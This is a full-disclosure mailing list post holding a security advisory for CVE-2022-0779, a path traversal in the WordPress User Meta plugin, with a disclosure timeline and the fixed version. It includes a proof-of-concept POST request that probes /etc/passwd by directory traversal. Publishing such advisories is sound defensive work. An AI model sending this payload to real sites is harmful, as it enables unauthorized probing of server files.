'[FD] [CVE-2022-0779] User Meta "um_show_uploaded_file" Path Traversal / Local File Enumeration'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] [CVE-2022-0779] User Meta "um_show_uploaded_file" Path Traversal / Local File Enumeration
From:       "Julien Ahrens (RCE Security)" <info () rcesecurity ! com>
Date:       2022-05-24 8:26:52
Message-ID: C5F1DD82-4918-4FEC-BE2F-1CD2A5E2ADBB () rcesecurity ! com
[Download RAW message or body]

RCE Security Advisory
https://www.rcesecurity.com

1. ADVISORY INFORMATION
=======================
Product:        User Meta
Vendor URL:     https://wordpress.org/plugins/user-meta
Type:           Relative Path Traversal [CWE-23]
Date found:     2022-02-28
Date published: 2022-05-24
CVSSv3 Score:   4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
CVE:            CVE-2022-0779

2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.

3. VERSIONS AFFECTED
====================
User Meta Lite 2.4.3 and below
User Meta Pro 2.4.3 and below

4. INTRODUCTION
===============
An easy-to-use user profile and management plugin for WordPress that allows
user login, reset-password, profile update and user registration with extra
fields, all on front-end and many more. User Meta Pro is a versatile user
profile builder and user management plugin for WordPress that has the most
features on the market. User Meta aims to be your only go to plugin for
user management.

(from the vendor's homepage)

5. VULNERABILITY DETAILS
========================
The WordPress ajax action "um_show_uploaded_file" is vulnerable to an
authenticated path traversal when user-supplied input to the HTTP POST
parameter "filepath" is processed by the web application. Since the application
does not properly validate and sanitize this parameter, it is possible to
enumerate local server files using a blind approach. This is because the
application doesn't return the contents of the referenced file but instead
returns different form elements based on whether a file exists or not.

The following Proof-of-Concept triggers this vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 147
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [your-wordpress-auth-cookies]
Connection: close

field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_k \
ey=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true

6. RISK
=======
The vulnerability can be used by an authenticated attacker to enumerate
local server files based on a blind approach.

7. SOLUTION
===========
Update to User Meta/User Meta Pro 2.4.4

8. REPORT TIMELINE
==================
2022-02-28: Discovery of the vulnerability
2022-02-28: WPScan (CNA) assigns CVE-2022-0779
2022-03-03: Contacted the vendor via their contact form
2022-03-06: Vendor response, acknowledgement of the issue
2022-03-18: Version 2.4.2 is released
2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. \
                Contacted vendor again.
2022-04-13: No response, contacted vendor again
2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.
2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor \
                again.
2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine
2022-05-16: Fix seems to work
2022-05-24: Public disclosure

9. REFERENCES
=============
https://github.com/MrTuxracer/advisories

["signature.asc" (signature.asc)]

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEWVym3nC1+ioyX1+TzjvwrNEH1JsFAmKMlswACgkQzjvwrNEH
1JsDsxAAx560pwP1JGE4ZgGWyKtvZMg/eKJmiQIE0AtKW38pqJ23E0TSW7LUwOLi
whbwJHz5nHt3iCfQUklurCJsuCxnIrr9pXMfGVPItswSVUKVWCzS76vRrtvzFQZp
mgYQhjtfqX4VFsE+Gg+o+SaWJ6flYzAM1oA/c/wd1pnhNraY15IP8a/Y0n7S/iyT
nHeNpvBmZ7ERpKse9xjGGWe7hJMzl838nhirJYAzC4fHwjVXklgysFl1T0wwSTX6
0oiAiFGNtjSHqbMX4AFpVQxzpEeDt5HWcHBEhtTdifQUx6b52137vSnQ/p93YnuV
SX5PD2wWSqQjZP08mc/gtyjLumRyL7d7/1fqIifo+1cXD4AvlWp/AR66JLZkcBaY
brzN8SMFIMV+lhimq0orp9mnqVOst56whi08ybS7WDfkZLXiOFHFMgX8kPkBrw7F
DqNdvVgoABksIhrJfziozTfCKWNZ4CcqdUbQ/BRhmKgyIHzaQTtM7H6kfVrD0D+W
fMDzfDeixQP3sP4ZdsDqpZ9kv5e1AZpzgi3BLG/NDCv3anBPFSCy+lkYYzzg1VIl
6J4kGPKP+VFekIn59cbPBtrkCbPTWSKmcxJ0ix58+D2gGccaVf5SAXkbRWz2xoAV
tOAWNnYwCjDWy9ANi77LCwA/YGv+gCWUO/bxdswgr9fSIza38Os=
=qe53
-----END PGP SIGNATURE-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
--===============2782723402394189869==--

[prev in list] [next in list] [prev in thread] [next in thread] 